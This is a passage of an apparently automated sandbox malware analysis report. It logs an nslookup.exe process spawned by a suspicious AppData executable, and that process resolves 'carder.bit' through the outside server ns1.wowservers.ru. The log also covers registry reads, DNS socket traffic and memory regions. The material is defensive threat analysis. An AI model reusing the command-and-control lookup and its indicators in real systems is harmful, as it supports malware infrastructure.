Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DNSLookupOrder False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = Domain True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpDomain False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = SearchList False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpSearchList False 1
Fn
DNS Get Hostname name_out = LHnIwsj True 1
Fn
DNS Resolve Name host = ns1.wowservers.ru, address_out = 189.75.183.21, 89.203.10.56, 94.249.60.127 True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 189.75.183.21, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 44, size_out = 44 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 189.75.183.21, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 28, size_out = 28 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 188 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 189.75.183.21, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 28, size_out = 28 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 698 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Process #21: nslookup.exe
8 18
»
Information Value
ID #21
File Name c:\windows\syswow64\nslookup.exe
Command Line nslookup carder.bit ns1.wowservers.ru
Initial Working Directory C:\Windows\SysWOW64\
Monitor Start Time: 00:04:33, Reason: Child Process
Unmonitor End Time: 00:04:36, Reason: Terminated by Timeout
Monitor Duration 00:00:03
OS Process Information
»
Information Value
PID 0xb98
Parent PID 0x8e8 (c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\tlgmea.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x B9C
0x BBC
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000650000 0x00650000 0x0066ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000650000 0x00650000 0x0065ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000660000 0x00660000 0x00663fff Private Memory Readable, Writable True False False -
private_0x0000000000670000 0x00670000 0x00671fff Private Memory Readable, Writable True False False -
nslookup.exe.mui 0x00670000 0x00674fff Memory Mapped File Readable False False False -
pagefile_0x0000000000680000 0x00680000 0x00693fff Pagefile Backed Memory Readable True False False -
private_0x00000000006a0000 0x006a0000 0x006dffff Private Memory Readable, Writable True False False -
private_0x00000000006e0000 0x006e0000 0x0071ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000720000 0x00720000 0x00723fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000730000 0x00730000 0x00730fff Pagefile Backed Memory Readable True False False -
private_0x0000000000740000 0x00740000 0x00741fff Private Memory Readable, Writable True False False -
locale.nls 0x00750000 0x0080dfff Memory Mapped File Readable False False False -
private_0x0000000000810000 0x00810000 0x0084ffff Private Memory Readable, Writable True False False -
private_0x0000000000850000 0x00850000 0x0088ffff Private Memory Readable, Writable True False False -
private_0x0000000000890000 0x00890000 0x00890fff Private Memory Readable, Writable True False False -
private_0x00000000008a0000 0x008a0000 0x008a0fff Private Memory Readable, Writable True False False -
private_0x00000000008b0000 0x008b0000 0x008bffff Private Memory Readable, Writable True False False -
imm32.dll 0x008c0000 0x008e9fff Memory Mapped File Readable False False False -
private_0x00000000008c0000 0x008c0000 0x008c3fff Private Memory Readable, Writable True False False -
private_0x00000000009a0000 0x009a0000 0x009affff Private Memory Readable, Writable True False False -
nslookup.exe 0x00ad0000 0x00ae6fff Memory Mapped File Readable, Writable, Executable True False False -
pagefile_0x0000000000af0000 0x00af0000 0x04aeffff Pagefile Backed Memory - True False False -
pagefile_0x0000000004af0000 0x04af0000 0x04c77fff Pagefile Backed Memory Readable True False False -
private_0x0000000004ce0000 0x04ce0000 0x04ddffff Private Memory Readable, Writable True False False -
pagefile_0x0000000004de0000 0x04de0000 0x04f60fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000004f70000 0x04f70000 0x0636ffff Pagefile Backed Memory Readable True False False -
wow64cpu.dll 0x54680000 0x54687fff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x54690000 0x546defff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x546e0000 0x54752fff Memory Mapped File Readable, Writable, Executable False False False -
winrnr.dll 0x733c0000 0x733cafff Memory Mapped File Readable, Writable, Executable False False False -
nlaapi.dll 0x733d0000 0x733e2fff Memory Mapped File Readable, Writable, Executable False False False -
pnrpnsp.dll 0x733f0000 0x73405fff Memory Mapped File Readable, Writable, Executable False False False -
napinsp.dll 0x73410000 0x73421fff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x73430000 0x73475fff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x73480000 0x73487fff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x73490000 0x73513fff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x73520000 0x7356dfff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x73620000 0x73627fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x73630000 0x7365ffff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x73e90000 0x73eaafff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x742b0000 0x74308fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x74310000 0x74319fff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x74320000 0x7433dfff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x74340000 0x743fdfff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x74f00000 0x74f5bfff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x74f80000 0x74faafff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x74fb0000 0x7509ffff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x750a0000 0x75215fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x75220000 0x75262fff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x75320000 0x7543ffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x754d0000 0x7560ffff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x75610000 0x75616fff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75620000 0x7576cfff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x75970000 0x75a1bfff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77210000 0x77388fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007e410000 0x7e410000 0x7e50ffff Pagefile Backed Memory Readable True False False -
pagefile_0x000000007e510000 0x7e510000 0x7e532fff Pagefile Backed Memory Readable True False False -
private_0x000000007e537000 0x7e537000 0x7e539fff Private Memory Readable, Writable True False False -
private_0x000000007e53a000 0x7e53a000 0x7e53afff Private Memory Readable, Writable True False False -
private_0x000000007e53b000 0x7e53b000 0x7e53dfff Private Memory Readable, Writable True False False -
private_0x000000007e53e000 0x7e53e000 0x7e53efff Private Memory Readable, Writable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7df9eec1ffff Private Memory Readable True False False -
pagefile_0x00007df9eec20000 0x7df9eec20000 0x7ff9eec1ffff Pagefile Backed Memory - True False False -
ntdll.dll 0x7ff9eec20000 0x7ff9eede1fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00007ff9eede2000 0x7ff9eede2000 0x7ffffffeffff Private Memory Readable True False False -
Threads
Thread 0xb9c
8 18
»
Category Operation Information Success Count Logfile
Module Get Handle module_name = c:\windows\syswow64\nslookup.exe, base_address = 0xad0000 True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DNSLookupOrder False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = Domain True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpDomain False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = SearchList False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpSearchList False 1
Fn
DNS Get Hostname name_out = LHnIwsj True 1
Fn
DNS Resolve Name host = ns1.wowservers.ru, address_out = 189.75.183.21, 89.203.10.56, 94.249.60.127 True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 189.75.183.21, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 44, size_out = 44 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 189.75.183.21, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 28, size_out = 28 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 188 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 189.75.183.21, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 28, size_out = 28 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 698 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Function Logfile
Download-Icon
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy". 


    

   

   

    Before
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    After
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image